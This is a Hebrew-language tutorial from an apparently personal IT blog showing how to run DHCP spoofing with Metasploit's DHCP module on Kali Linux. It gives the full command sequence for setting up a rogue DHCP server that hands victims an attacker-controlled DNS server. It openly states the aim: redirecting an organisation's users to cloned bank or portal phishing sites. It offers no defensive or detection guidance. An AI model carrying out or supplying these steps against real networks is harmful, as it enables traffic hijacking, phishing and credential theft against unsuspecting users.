כל הזכויות שמורות לטל בן שושן – Shushan.co.il
ביצוע DHCP Spoofing ע"י Metasploit
על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit
התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit
DHCP Spoofing, מאפשר לנו ליצור מצב בו אנחנו יוצרים מצב בו הDHCP שיצרנו הוא למעשה הDHCP שיחלק כתובות IP למחשבים ברשת.
נאמר ובארגון שאותו אתם תוקפים קיים שרת DHCP ואתם מעוניינים ל"השתלט" על אותו שרת DHCP, הדרך היעילה ביותר היא לבצע DHCP Spoofing שכן אתם יוצרים שרת DHCP משלכם ואז מחלקים את הכתובות שאתם רוצים.
המטרה הראשית היא לוא דווקא לחלק כתובות IP סתם למשתמשים אלא להחליט איזה שרתי DNS יחולקו להם ובכך תוכלו ליצור Phishing בקלות רבה יותר, נאמר תעתיקו את הפורטל שלהם או אתר של בנק או מערכת כספים כזו או אחרת ואז בשרת ה DNS שלכם תגדירו שהם מגיעים לשרת ה Phishing שלכם.
דרוש:
- KALI מותקן
- מחשב Windows 10/8/7 שמוגדר לקבל כתובת IP אוטומטי DHCP
נפתח בKALI את הטרמינל ונרשום
sudo route add default gw 192.168.1.1 eth0
בפקודה זו נגדיר שהDefault Gateway לכרטיס הרשת eth0 הוא 192.168.1.1
כעת נפתח את Metasploit
sudo msfconsole
כעת נשתמש ב Auxiliary של DHCP על מנת ליצור "DHCP" משלנו
use auxiliary/server/dhcp
נגדיר את טווח הכתובות שהוא יחלק, נתחיל מהכתובת 192.168.1.150
set DHCPIPSTART 192.168.1.150
נגדיר עד איזה כתובת הוא יחלק
set DHCPIPEND 192.168.1.155
סה"כ 6 כתובות
כאן ההגדרה החשובה, איזה DNS הוא יחלק, כמובן שאתם צריכים ליצור שרת DNS ולהגדיר אותו שיבצע Forward לDNS של אותו ארגון ורק דברים מסויימים שרת ה DNS שלכם יענה, כך המשתמשים לא יבחינו שDHCP אחר מחלק להם כתובות
set DNSSERVER 192.168.1.160
כעת נגדיר את כתובת השרת שלכם
set SRVHOST 192.168.1.160
נגדיר את ה Subnet Mask
set NETMASK 255.255.255.0
נגדיר את ה Default Gateway
set ROUTER 192.168.1.1
כעת נבדוק שהכל תקין
show options
מעולה, כעת נריץ את ה DHCP Spoofing
run
